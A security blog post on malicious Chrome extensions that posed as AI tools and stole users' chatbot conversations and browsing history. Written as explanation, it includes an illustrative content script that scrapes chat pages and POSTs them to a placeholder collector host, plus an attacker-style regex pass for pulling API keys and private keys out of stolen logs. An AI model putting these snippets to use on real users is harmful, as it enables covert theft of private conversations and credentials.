According to Dark Reading, a recent campaign involved two malicious Google Chrome extensions posing as legitimate AI tools from a company called AItopia. One extension, “ChatGPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI,” had over 600,000 users and even carried Google’s “Featured” badge, while the other, “AI Sidebar with Deepseek, ChatGPT, Claude and more,” had over 300,000. Researchers from Ox Security found the extensions were exfiltrating complete user conversation data from services like ChatGPT and DeepSeek, along with full browser history, to a command-and-control server. The stolen data included proprietary source code, business strategies, and confidential documents. Although the extensions were live when Ox published its findings just a few weeks ago, both have since been removed from the Chrome Web Store.
The Prompt Poaching Problem
Here’s the thing that gets me: these extensions were brazen. They asked for permission to collect “anonymous, non-identifiable analytics data,” and users just clicked “accept.” But that consent was the cover for stealing everything. Every query, every piece of code pasted into ChatGPT, every internal corporate URL open in a tab—all of it got sent off to some attacker’s server. Researchers have a name for this now: “prompt poaching.” It’s a perfect storm. People are using LLMs for incredibly sensitive work—drafting legal docs, debugging proprietary software, brainstorming business plans—and they’re doing it right in their browser. They don’t think twice about a sidebar extension, especially one Google itself has tagged as “Featured.” That badge creates a dangerous illusion of safety.
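To make the mechanics concrete, here is a minimal sketch of what that side channel can look like. This is not the actual AItopia code, which Ox has not published in full; the C2 endpoint, the DOM selector, and the payload shape are all hypothetical stand-ins.

```typescript
// Illustrative content script, NOT the recovered extension code.
// C2_ENDPOINT and the selector below are hypothetical placeholders.
const C2_ENDPOINT = "https://collector.example.invalid/ingest";

function harvestVisibleConversation(): string[] {
  // Chat UIs render each turn as a DOM node; one generic selector suffices.
  return Array.from(document.querySelectorAll("[data-message-author-role]"))
    .map((node) => node.textContent ?? "");
}

// Re-harvest whenever the page changes, and ship each batch off-site.
const observer = new MutationObserver(() => {
  const turns = harvestVisibleConversation();
  if (turns.length === 0) return;
  void fetch(C2_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    // The same payload could just as easily carry tab URLs or history.
    body: JSON.stringify({ url: location.href, turns }),
  });
});
observer.observe(document.body, { childList: true, subtree: true });
```

That is the whole trick: an extension with host access to the page needs no exploit, just a fetch call the user already authorized with one click.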
Why This Data Is A Goldmine
You might wonder, what’s the point? Sifting through nearly a million users’ random chat logs sounds like a nightmare. But that’s where modern tooling comes in. As the Ox researcher told Dark Reading, automated scripts and LLMs make finding the valuable nuggets easier than ever. We’re not just talking about someone’s pizza order. This data includes credit card images, cloud account passwords, and API keys that people accidentally paste in. It includes the complete browsing history of employees, which is itself a commodity sold for targeted marketing or espionage. Think about it. An attacker gets a trove of data showing exactly what a software engineer at a tech company is searching for, what internal tools they use, and what code problems they’re trying to solve. That’s corporate espionage on a platter. They don’t need to breach the firewall; the user invited the spy right into their workspace.
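To see why the sifting is cheap, here is a hedged sketch of the kind of regex triage an attacker might run over a dump before handing the leftovers to an LLM for summarization. The patterns and the sample input are illustrative guesses, not anything from the Ox report.

```typescript
// Illustrative triage pass over stolen chat logs; patterns are my own guesses.
const SECRET_PATTERNS: Record<string, RegExp> = {
  awsAccessKeyId: /\bAKIA[0-9A-Z]{16}\b/g,
  privateKeyBlock: /-----BEGIN (?:RSA |EC )?PRIVATE KEY-----/g,
  genericApiKey: /\b(?:api[_-]?key|token)\b\s*[:=]\s*['"]?[\w-]{20,}/gi,
};

// Scan one log and bucket any matches by pattern name.
function triage(chatLog: string): Map<string, string[]> {
  const hits = new Map<string, string[]>();
  for (const [label, pattern] of Object.entries(SECRET_PATTERNS)) {
    const matches = chatLog.match(pattern);
    if (matches) hits.set(label, matches);
  }
  return hits;
}

// A pasted snippet a human reviewer would skim past, a regex will not.
console.log(triage('debug this: api_key = "sk_live_4242424242424242abcdef"'));
// logs a Map with one "genericApiKey" hit
```

Anything flagged gets escalated immediately; the bulk remainder can be summarized by an LLM asked to pull out business plans, source code, and credentials.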
A Broader Trust Crisis
So what’s the fix? Users are told to avoid extensions from unknown sources, but one of these carried a Featured badge! The entire trust model of browser extension stores is showing cracks. This incident is a massive red flag for any organization. Your data security policy might ban ChatGPT at the network level, but if an employee installs a malicious extension, all that sensitive data leaks out through a side channel anyway. It fundamentally changes the attack surface. The Ox Security blog recommends immediate removal of these specific extensions, but the lesson is bigger: we have to treat browser extensions with the same suspicion we treat random .exe files. They have deep, persistent access to everything the browser touches. And in an industrial or corporate setting, that access can expose critical operational data. It underscores why securing the endpoint, the actual machine where work is done, is so crucial, whether it’s an office laptop or a hardened industrial panel PC on a factory floor. The principle is the same: the interface is a vulnerability.
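On the defensive side, the extension machinery cuts both ways. Here is a minimal audit sketch using Chrome’s chrome.management API, which an IT-deployed extension holding the "management" permission could run; the broad-host-permission heuristic is an assumption of mine, not an Ox recommendation.

```typescript
// Audit sketch: assumes an IT-deployed extension with the "management"
// permission. The broad-host heuristic below is an illustrative assumption.
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

chrome.management.getAll((installed) => {
  for (const ext of installed) {
    const hosts = ext.hostPermissions ?? [];
    const readsEveryPage = hosts.some((h) => BROAD_HOSTS.includes(h));
    if (ext.enabled && readsEveryPage) {
      // Anything flagged can see AI chat sessions, internal tabs, the lot.
      console.warn(`Review: ${ext.name} (${ext.id}), installType=${ext.installType}`);
    }
  }
});
```

In a managed fleet the same idea is usually enforced with Chrome’s ExtensionInstallBlocklist enterprise policy rather than a script, but the audit makes the point: host-wide read access is the red flag, wherever the extension came from.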
The New Normal For AI Security
Basically, this is the new normal. As AI tools become workflow staples, they become giant, juicy targets. Threat actors are innovating right alongside the tech they’re exploiting. “Prompt poaching” won’t be the last clever term we hear. The scary part is that the objective wasn’t even clear. Was it direct financial theft? Corporate spying? Or just amassing a huge dataset to sell in chunks on the dark web? Probably all of the above. The takeaway is painfully simple: be paranoid about what you install, even (maybe especially) from official stores. And assume anything you type into an AI, or any tab you have open, could be watched if you’ve let the wrong tool into your browser. That’s the price of this incredible convenience.
